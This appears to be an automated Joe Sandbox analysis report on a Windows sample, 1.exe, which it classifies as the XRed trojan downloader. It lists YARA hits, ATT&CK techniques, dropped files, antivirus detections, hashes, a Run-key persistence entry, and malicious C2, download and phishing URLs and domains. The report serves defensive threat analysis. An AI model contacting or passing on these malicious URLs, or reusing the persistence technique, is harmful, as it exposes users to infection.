Source: Yara match; File source: 00000001.00000000.1304613100.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: 1.exe PID: 2584, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: Synaptics.exe PID: 2260, type: MEMORYSTR
Source: Yara match; File source: C:\Users\user\Documents\~$cache1, type: DROPPED
Source: Yara match; File source: C:\ProgramData\Synaptics\RCX9CB3.tmp, type: DROPPED
Source: Yara match; File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED

                              Remote Access Functionality

Source: Yara match; File source: decrypted.binstr, type: MEMORYSTR
Source: Yara match; File source: 1.exe, type: SAMPLE
Source: Yara match; File source: 1.0.1.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000003.00000003.1381263733.00000000007A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000000.1304613100.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: 1.exe PID: 2584, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: Synaptics.exe PID: 2260, type: MEMORYSTR
Source: Yara match; File source: C:\Users\user\Documents\~$cache1, type: DROPPED
Source: Yara match; File source: C:\ProgramData\Synaptics\RCX9CB3.tmp, type: DROPPED
Source: Yara match; File source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 41 Scripting | 1 Replication Through Removable Media | 1 PowerShell | 41 Scripting | 11 Process Injection | 12 Masquerading | OS Credential Dumping | 1 Query Registry | Remote Services | 1 Screen Capture | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 Registry Run Keys / Startup Folder | 1 Registry Run Keys / Startup Folder | 11 Virtualization/Sandbox Evasion | LSASS Memory | 111 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | 1 DLL Side-Loading | 1 DLL Side-Loading | 11 Process Injection | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | 2 Clipboard Data | 3 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Extra Window Memory Injection | 11 Deobfuscate/Decode Files or Information | NTDS | 11 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 34 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 Peripheral Device Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 DLL Side-Loading | Cached Domain Credentials | 3 File and Directory Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Extra Window Memory Injection | DCSync | 12 System Information Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Behavior Graph (ID: 1585287, Sample: 1.exe, Startdate: 07/01/2025, Architecture: WINDOWS, Score: 100)

Top level
• DNS/IP: freedns.afraid.org (signature: Uses dynamic DNS services), xred.mooo.com, 4 other IPs or domains
• Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Antivirus detection for URL or domain; 14 other signatures
• Started: 1.exe, EXCEL.EXE

1.exe
• Dropped: C:\Users\user\Desktop\._cache_1.exe, PE32
• Dropped: C:\ProgramData\Synaptics\Synaptics.exe, PE32
• Dropped: C:\ProgramData\Synaptics\RCX9CB3.tmp, PE32
• Dropped: C:\...\Synaptics.exe:Zone.Identifier, ASCII
• Signature: LummaC encrypted strings found
• Started: Synaptics.exe, ._cache_1.exe

Synaptics.exe
• DNS/IP: docs.google.com 142.250.185.110, 443, 49744, 49745 GOOGLEUS United States
• DNS/IP: drive.usercontent.google.com 142.250.186.161, 443, 49755, 49756 GOOGLEUS United States
• DNS/IP: freedns.afraid.org 69.42.215.252, 49753, 80 AWKNET-LLCUS United States
• Dropped: C:\Users\user\Documents\~$cache1, PE32
• Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Drops PE files to the document folder of the user
• Started: WerFault.exe

._cache_1.exe
• Signature: Machine Learning detection for dropped file

Source | Detection | Scanner | Label
1.exe | 85% | Virustotal |
1.exe | 87% | ReversingLabs | Win32.Trojan.Synaptics
1.exe | 100% | Avira | TR/Dldr.Agent.SH
1.exe | 100% | Avira | W2000M/Dldr.Agent.17651006
1.exe | 100% | Joe Sandbox ML |

Source | Detection | Scanner | Label
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | TR/Dldr.Agent.SH
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Avira | W2000M/Dldr.Agent.17651006
C:\ProgramData\Synaptics\RCX9CB3.tmp | 100% | Avira | TR/Dldr.Agent.SH
C:\ProgramData\Synaptics\RCX9CB3.tmp | 100% | Avira | W2000M/Dldr.Agent.17651006
C:\Users\user\Documents\~$cache1 | 100% | Avira | TR/Dldr.Agent.SH
C:\Users\user\Documents\~$cache1 | 100% | Avira | W2000M/Dldr.Agent.17651006
C:\ProgramData\Synaptics\Synaptics.exe | 100% | Joe Sandbox ML |
C:\ProgramData\Synaptics\RCX9CB3.tmp | 100% | Joe Sandbox ML |
C:\Users\user\Documents\~$cache1 | 100% | Joe Sandbox ML |
C:\Users\user\Desktop\._cache_1.exe | 100% | Joe Sandbox ML |
C:\ProgramData\Synaptics\Synaptics.exe | 87% | ReversingLabs | Win32.Trojan.Synaptics

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label
twistforcepo.cfd | 0% | Avira URL Cloud | safe
https://docs.goow | 0% | Avira URL Cloud | safe
http://xred.site50.net/syn/SUpdate.iniH) | 100% | Avira URL Cloud | malware
https://docs.goo | 0% | Avira URL Cloud | safe
http://xred.site50.net/syn/SSLLibrary.dlp | 100% | Avira URL Cloud | malware

Name | IP | Active | Malicious | Antivirus Detection | Reputation
freedns.afraid.org | 69.42.215.252 | true | false | | high
docs.google.com | 142.250.185.110 | true | false | | high
s-part-0017.t-0009.t-msedge.net | 13.107.246.45 | true | false | | high
drive.usercontent.google.com | 142.250.186.161 | true | false | | high
xred.mooo.com | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
twistforcepo.cfd | true | Avira URL Cloud: safe | unknown
xred.mooo.com | false | | high
rabidcowse.shop | false | | high
wholersorie.shop | false | | high
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 | false | | high
cloudewahsj.shop | false | | high
noisycuttej.shop | false | | high
nearycrepso.shop | false | | high
framekgirus.shop | false | | high
tirepublicerj.shop | false | | high
abruptyopsn.shop | false | | high

IP | Domain | Country | ASN | ASN Name | Malicious
142.250.186.161 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false
142.250.185.110 | docs.google.com | United States | 15169 | GOOGLEUS | false
69.42.215.252 | freedns.afraid.org | United States | 17048 | AWKNET-LLCUS | false

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1585287
Start date and time: 2025-01-07 13:17:18 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 6m 19s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: 1.exe
Detection: MAL
Classification: mal100.troj.expl.evad.winEXE@7/28@6/3
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 94%
• Number of executed functions: 7
• Number of non-executed functions: 121
Cookbook Comments:
• Found application associated with file extension: .exe
                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                    • Excluded IPs from analysis (whitelisted): 52.109.32.97, 184.28.90.27, 52.113.194.132, 23.56.254.164, 20.189.173.8, 20.42.65.92, 13.107.246.45, 40.126.32.76, 20.12.23.50
                                                                                                                    • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.afd.azureedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, ecs-office.s-0005.s-msedge.net, onedscolprdwus07.westus.cloudapp.azure.com, login.live.com, e16604.g.akamaiedge.net, officeclient.microsoft.com, ukw-azsc-config.officeapps.live.com, prod.fs.microsoft.com.akadns.net, ecs.office.com, self-events-data.trafficmanager.net, fs.microsoft.com, otelrules.azureedge.net, prod.configsvc1.live.com.akadns.net, self.events.data.microsoft.com, ctldl.windowsupdate.com, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, s-0005.s-msedge.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, azureedge-t-prod.trafficmanager.net, umwatson.events.data.microsoft.com, ecs.office.trafficmanager.net, europe.configsvc1.live.com.akadns.net
• Not all processes were analyzed, report is missing behavior information
                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.

Time | Type | Description
07:18:26 | API Interceptor | 115x Sleep call for process: Synaptics.exe modified
07:18:45 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
13:18:22 | Autostart | Run: HKLM\Software\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device Driver C:\ProgramData\Synaptics\Synaptics.exe

Match | Associated Sample Name / URL | Detection | Threat Name | Context
69.42.215.252 | file.exe | malicious | XRed | freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    s-part-0017.t-0009.t-msedge.net64pOGv7k4N.exeGet hashmaliciousLummaCBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    https://docs.google.com/presentation/d/e/2PACX-1vT2PGn0zBbaptqxmzd37o4wD_789vdOk0IyvB9NJB93qGFh_af8Du5RuZX0G1lsycIP1UzhONEj31sn/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    mail-41.emlGet hashmaliciousUnknownBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    Mansourbank Swift-TT379733 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    Mansourbank Swift-TT680169 Report.svgGet hashmaliciousBranchlock ObfuscatorBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    https://e.trustifi.com/#/fff2a0/615048/6b9108/bb6bb8/0c4d40/10c266/f490c9/97ed1b/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/85de28/9434d8/86c8f5/bcad02/214fc7/998ea3/f74550/f15e41/328dbb/f2d014/49d879/3689f7/91b4f6/9617cd/897401/851960/993266/280340/ae6054/337b49/6f0428/673840/abdb07/82b8be/00f4e1/3270c4/922952/b4db4e/e9dcee/3a01c5/962a76/930521/2e7fc6/514759/a95ca8/c37226/be9e63/3c4ec2/89148e/13fdfe/ea86c0/04048b/56ab74/dca15f/97696c/fa7912/512e28/fc9f59/50d13f/4f0114/039a8f/84bd72/2603b6/e0eceb/28f211/4fdb34/a1dc16/2076ef/8e55cf/8f9d2c/0d4402/f5a713/43ec64/fabda1/b6994c/da2da1/2851a8/b04ed3/8cea9a/1e21dc/0abaf5/7df73e/f39a96/1f2244/423c00/5c4e8dGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    https://t1.a.editions-legislatives.fr/r/?id=hfe20c57a%2C3602a3f1%2C7f94ba88&p1=//www.google.co.nz/url?q=k8pQvvqad5fe5yj7Y00xDjnlx9kIHvsdvds44vs4d4aAkImPuQvsdv44WtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRvdsvsdvswqyicT&sa=t&url=amp/yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20=&ago=212&ao=817&aca=-11&si=-11&ci=-11&pi=-11&ad=-11&sv1=-11&advt=-11&chnl=-11&vndr=1363&sz=539&u=eTLPPreWarranty%7CConsumer&red=http://www.lampsplus.com/?sourceid=eTLPPreWarranty&cm_mmc=TRA-EM-_-LP-_-eTLPPreWarranty-_-tlogo&counterid=tlogoGet hashmaliciousHTMLPhisherBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    64.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    iy1.dat.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    BXOZIGZEUa.exeGet hashmaliciousBdaejecBrowse
                                                                                                                    • 13.107.246.45
                                                                                                                    freedns.afraid.orgfile.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    AWKNET-LLCUSfile.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    file.exeGet hashmaliciousXRedBrowse
                                                                                                                    • 69.42.215.252
                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                    37f463bf4616ecd445d4a1937da06e199876567899.bat.exeGet hashmaliciousLokibotBrowse
                                                                                                                    • 142.250.186.161
                                                                                                                    • 142.250.185.110
                                                                                                                    23567791246-764698008.02.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 142.250.186.161
                                                                                                                    • 142.250.185.110
                                                                                                                    c2.htaGet hashmaliciousRemcosBrowse
                                                                                                                    • 142.250.186.161
                                                                                                                    • 142.250.185.110
                                                                                                                    H565rymIuO.docGet hashmaliciousUnknownBrowse
                                                                                                                    • 142.250.186.161
                                                                                                                    • 142.250.185.110
                                                                                                                    287438657364-7643738421.08.exeGet hashmaliciousNitolBrowse
                                                                                                                    • 142.250.186.161
                                                                                                                    • 142.250.185.110
                                                                                                                    287438657364-7643738421.08.exeGet hashmaliciousUnknownBrowse
                                                                                                                    • 142.250.186.161
                                                                                                                    • 142.250.185.110
                                                                                                                    u1XWB0BIju.msiGet hashmaliciousUnknownBrowse
                                                                                                                    • 142.250.186.161
                                                                                                                    • 142.250.185.110
                                                                                                                    setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                    • 142.250.186.161
                                                                                                                    • 142.250.185.110
                                                                                                                    2749837485743-7684385786.05.exeGet hashmaliciousNitolBrowse
                                                                                                                    • 142.250.186.161
                                                                                                                    • 142.250.185.110
                                                                                                                    No context
                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):118
                                                                                                                    Entropy (8bit):3.5700810731231707
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:QaklTlAlXMLLmHlIlFLlmIK/5lTn84vlJlhlXlDHlA6l3l6Als:QFulcLk04/5p8GVz6QRq
                                                                                                                    MD5:573220372DA4ED487441611079B623CD
                                                                                                                    SHA1:8F9D967AC6EF34640F1F0845214FBC6994C0CB80
                                                                                                                    SHA-256:BE84B842025E4241BFE0C9F7B8F86A322E4396D893EF87EA1E29C74F47B6A22D
                                                                                                                    SHA-512:F19FA3583668C3AF92A9CEF7010BD6ECEC7285F9C8665F2E9528DBA606F105D9AF9B1DB0CF6E7F77EF2E395943DC0D5CB37149E773319078688979E4024F9DD7
                                                                                                                    Malicious:false
                                                                                                                    Reputation:high, very likely benign file
Preview:<?xml version="1.0" encoding="UTF-16"?>..<HeartbeatCache/>
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):65536
                                                                                                                    Entropy (8bit):1.133326375425338
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:fmBVps3Imo0WMn4DzJDzqjLOA/FczxwzuiFc/Z24IO8EKDzy:My35WMn4JqjkKzuiFc/Y4IO8zy
                                                                                                                    MD5:FB203EC6304224ED55D9CF99C716CB2C
                                                                                                                    SHA1:F0DA6B7AAA5476951D92441FC6B33790013BA9BA
                                                                                                                    SHA-256:9840CCC5462DB65AB0CF41ED3A89B00958D3AF04000518ECDD0CD109E47749DC
                                                                                                                    SHA-512:69B4B0536201FFB0670EFA66EF98E62B6F7BE2CAE1C0314655C88A27D42CD38882B8A6DF1BD6B1F5EEA50386E1D4EDD99DDF0A5B23786BDC4821CA7924E2A970
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
Preview:Version=1..EventType=APPCRASH..EventTime=133807259200130320..ReportType=2..Consent=1..UploadTime=133807259234974016..ReportStatus=524384..ReportIdentifier=cc67f19a-ef6b-45cb-8e05-6f572bf8087e..IntegratorReportIdentifier=77d17bfc-fd16-47f0-b70c-131addaac4df..Wow64Host=34404..Wow64Guest=332..NsAppName=Synaptics.exe..AppSessionGuid=000008d4-0001-0013-c8ec-1c3dfe60db01..TargetAppId=W:0006b99a137d593dda9d158dc8b6b7720deb00001f04!00001b93e985bc3000bac77112697f6702b2eb52cc37!Synaptics.exe..TargetAppVe
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:Mini DuMP crash report, 15 streams, Tue Jan 7 12:18:40 2025, 0x1205a4 type
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):2139536
                                                                                                                    Entropy (8bit):1.8205505237118613
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3072:qWQzOICwegAKSLywJRjmx9mYFvi6wpqYKLPFqwL5Me4DfLRPWf0BuAQpQQh:qWQrCvbDRjd4kqYcpABw0BmLh
                                                                                                                    MD5:EDDAEF1468D1980FE079705DAC29D66F
                                                                                                                    SHA1:8CC0E10F102B5B0E82281F3049C4054006AC35FB
                                                                                                                    SHA-256:073797EF1786BA6FD13BCDA9C2C1C5C15E4D47A772A022CD1EFB6835B2E8DE62
                                                                                                                    SHA-512:06E4B731019575D04080D7BC5D6D038C6A1A12A88EEF91960C64CBC833D01ED53D920197F2CE9956AF6DF52EE51D7486C86C5095AAA78B37DEB348A444E06470
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):6302
                                                                                                                    Entropy (8bit):3.7145337268819967
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:R6l7wVeJ5xy6CYiSW5XpDA89bPcjsfStam:R6lXJa6CYu5PkIfY
                                                                                                                    MD5:DCD3C9442CD7122AB5355DF492894E18
                                                                                                                    SHA1:D1CB7CAAE2DDEAF496FD08A5FC6062F0946B64A1
                                                                                                                    SHA-256:A11E5E29290736FBF36FEE9901F45AFA866F20E1726B1BA4043B28EE38040218
                                                                                                                    SHA-512:23491B191B186A3E360277A3B0F4BC16CDD23FEA5AF0B5A7D8B1B0205FA7E9468F5146B148D0BB4D0EBFCDE695E8AA19A952369529028412F0AED6BE7FE4655B
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
Preview:<?xml version="1.0" encoding="UTF-16"?>..<WERReportMetadata>.. <OSVersionInformation>..  <WindowsNTVersion>10.0</WindowsNTVersion>..  <Build>19045</Build>..  <Product>(0x30): Windows 10 Pro</Product>..  <Edition>Professional</Edition>..  <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString>..  <Revision>2006</Revision>..  <Flavor>Multiprocessor Free</Flavor>..  <Architecture>X64</Architecture>..  <LCID>2057</LCID>.. </OSVersionInformation>.. <ProcessInformation>..  <Pid>2260</Pi
                                                                                                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):4572
                                                                                                                    Entropy (8bit):4.442504612095313
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:48:cvIwWl8zsPQJg77aI9k3WpW8VYFYm8M4JFetFOE+q84ihUlsZ9d:uIjfPWI7aG7VhJPEMUlsZ9d
                                                                                                                    MD5:6C1B52DF00F1600A731E245E705D611B
                                                                                                                    SHA1:E0E9A3999E6127783331DAC4E8654828A831F266
                                                                                                                    SHA-256:13AA1276889A55CA8D966C16661CE806A2CD0B957EC02DBE19B9918F3FED51D0
                                                                                                                    SHA-512:D4328B0B98693ED818A11148DC9B4D1528BDDC56A927B1139E648CA93A40B82FB6AF5BF0EB1DBBFBF347FF6A539D857F7BA97628F331570B206290F18B9226D0
                                                                                                                    Malicious:false
                                                                                                                    Reputation:low
                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="665481" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                    Process:C:\Users\user\Desktop\1.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:modified
                                                                                                                    Size (bytes):772096
                                                                                                                    Entropy (8bit):6.636956363807124
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:aMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9F6+:ansJ39LyjbJkQFMhmC+6GD9B
                                                                                                                    MD5:065BECDE24188ED65E53BECB09A5A039
                                                                                                                    SHA1:1B93E985BC3000BAC77112697F6702B2EB52CC37
                                                                                                                    SHA-256:641147AE6E518E7930EFE2A90B61DD0A22F23BBA6D77F7FAE48380A6F7842E6C
                                                                                                                    SHA-512:879D047CF07153B113D39A20BFDEC4B3429D5B431641D026AE38FBBD198C40BD28179CC03B9A208C3214B4E604E568E5813B20E720F150E9A06EE7C54D667A08
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\RCX9CB3.tmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\RCX9CB3.tmp, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    Process:C:\Users\user\Desktop\1.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1101824
                                                                                                                    Entropy (8bit):6.7652852257842975
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24576:FnsJ39LyjbJkQFMhmC+6GD9nkKh5OYceEMQ+h0W:FnsHyjtk2MYC5GDT58M7hH
                                                                                                                    MD5:D0598443FA9984227105811E5D89B70F
                                                                                                                    SHA1:3932D4696F4130658FBF2A16E7F771FC756A63CC
                                                                                                                    SHA-256:FC1595C71B570027B6712C70CAFCC075686E14B5702A5A0910F642EB739AC01F
                                                                                                                    SHA-512:142EBD6E1BF24D82533355E76BB9433DEEFDD4EE918BA04CC12419CC17CB564F86AF386BF949617E386BFFA1E0036EC5DB912BC8B985A1DE94330B3B14E3FD29
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                    • Antivirus: ReversingLabs, Detection: 87%
                                                                                                                    Process:C:\Users\user\Desktop\1.exe
                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):26
                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                    Malicious:true
                                                                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                    Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):1652
                                                                                                                    Entropy (8bit):5.269673333085929
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:24:GgsF+0JSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+C+pAZewRDK4mW
                                                                                                                    MD5:FE2DC39B57A684C3BE12F81E9BB5C598
                                                                                                                    SHA1:EE4D488252D35907BC5B92BE9D8ED3233127B07E
                                                                                                                    SHA-256:03D716C13F3A18F32987D02BD096CD55F3A89B5A732A8893B1D5D91D16B02675
